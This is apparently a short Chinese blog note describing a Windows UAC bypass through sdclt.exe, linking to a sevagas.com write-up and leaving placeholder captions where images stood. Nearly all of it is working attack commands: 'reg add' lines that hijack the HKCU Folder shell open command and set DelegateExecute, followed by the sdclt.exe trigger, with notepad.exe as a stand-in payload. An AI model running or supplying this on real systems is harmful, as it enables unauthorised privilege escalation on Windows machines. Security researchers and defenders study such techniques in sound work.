enter description here

enter description here

enter description here

http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass

写入注册表

1
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c notepad.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f

触发

1
%windir%\system32\sdclt.exe